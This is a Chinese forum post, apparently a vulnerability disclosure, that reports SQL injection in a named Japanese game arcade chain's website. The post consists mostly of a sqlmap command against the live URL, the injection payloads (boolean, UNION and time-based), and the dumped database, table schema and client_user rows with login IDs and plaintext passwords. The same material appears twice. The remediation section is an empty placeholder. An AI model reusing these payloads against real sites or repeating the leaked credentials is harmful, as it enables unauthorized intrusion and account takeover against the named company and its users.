HanDs
管理员

[7月漏洞公开] 日本某大型游戏机连锁店存在sql注入 



RT

详细说明:

官方网址:http://www.atime.co.jp,存在注入的网址:http://www.atime.co.jp/shop.php?sid=1 蚕食sid存在注入,放入sqlmap如下:



C:\Python27\SQLMap>sqlmap.py -u "http://www.atime.co.jp/shop.php?sid=1" --dbs --time-sec 2

Place: GET

Parameter: sid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: sid=1 AND 9458=9458



Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: sid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,108,100,103,58),IFNULL(CAST(CHAR(108,114,110,112,85,120,87,79,116,69) AS CHAR),CHAR(32)),CHAR(58,113,121,111,58)), NULL, NULL, NULL, NULL#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: sid=1 AND SLEEP(2)

---



[15:10:21] [INFO] the back-end DBMS is MySQL



web application technology: Apache, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

[15:10:21] [INFO] fetching database names

available databases [1]:

[*] LA04659038-atime1227



数据库LA04659038-atime1227里面有11张表如下:

Database: `LA04659038-atime1227`

[11 tables]

+-------------------+

| atm_blog |

| atm_blog_category |

| atm_blog_image |

| atm_gallery |

| atm_machine |

| atm_news |

| atm_ranking |

| atm_recruit |

| atm_setting |

| atm_shop |

| client_user |

+-------------------+



查看client_user表



Database: `LA04659038-atime1227`

Table: client_user

[5 columns]

+------------------+--------------+

| Column | Type |

+------------------+--------------+

| registration_day | datetime |

| user_id | bigint(20) |

| user_login_id | varchar(30) |

| user_login_pwd | varchar(30) |

| user_name | varchar(255) |

+------------------+--------------+



表数据:



database '`LA04659038-atime1227`'

Database: `LA04659038-atime1227`

Table: client_user

[2 entries]

+---------+---------------+----------------+-----------+

| user_id | user_login_id | user_login_pwd | user_name |

+---------+---------------+----------------+-----------+

| 2 | taka | takaherc | HERC |

| 4 | atime | atime777 | ATIME |

+---------+---------------+----------------+-----------+



明文密码。





漏洞证明:

官方网址:http://www.atime.co.jp,存在注入的网址:http://www.atime.co.jp/shop.php?sid=1 蚕食sid存在注入,放入sqlmap如下:



C:\Python27\SQLMap>sqlmap.py -u "http://www.atime.co.jp/shop.php?sid=1" --dbs --time-sec 2

Place: GET

Parameter: sid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: sid=1 AND 9458=9458



Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: sid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,108,100,103,58),IFNULL(CAST(CHAR(108,114,110,112,85,120,87,79,116,69) AS CHAR),CHAR(32)),CHAR(58,113,121,111,58)), NULL, NULL, NULL, NULL#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: sid=1 AND SLEEP(2)

---



[15:10:21] [INFO] the back-end DBMS is MySQL



web application technology: Apache, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

[15:10:21] [INFO] fetching database names

available databases [1]:

[*] LA04659038-atime1227



数据库LA04659038-atime1227里面有11张表如下:

Database: `LA04659038-atime1227`

[11 tables]

+-------------------+

| atm_blog |

| atm_blog_category |

| atm_blog_image |

| atm_gallery |

| atm_machine |

| atm_news |

| atm_ranking |

| atm_recruit |

| atm_setting |

| atm_shop |

| client_user |

+-------------------+



查看client_user表



Database: `LA04659038-atime1227`

Table: client_user

[5 columns]

+------------------+--------------+

| Column | Type |

+------------------+--------------+

| registration_day | datetime |

| user_id | bigint(20) |

| user_login_id | varchar(30) |

| user_login_pwd | varchar(30) |

| user_name | varchar(255) |

+------------------+--------------+



表数据:



database '`LA04659038-atime1227`'

Database: `LA04659038-atime1227`

Table: client_user

[2 entries]

+---------+---------------+----------------+-----------+

| user_id | user_login_id | user_login_pwd | user_name |

+---------+---------------+----------------+-----------+

| 2 | taka | takaherc | HERC |

| 4 | atime | atime777 | ATIME |

+---------+---------------+----------------+-----------+



明文密码。



修复方案:

修复


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
日本
#1楼
发帖时间:2016-7-16   |   查看数:0   |   回复数:0
游客组
快速回复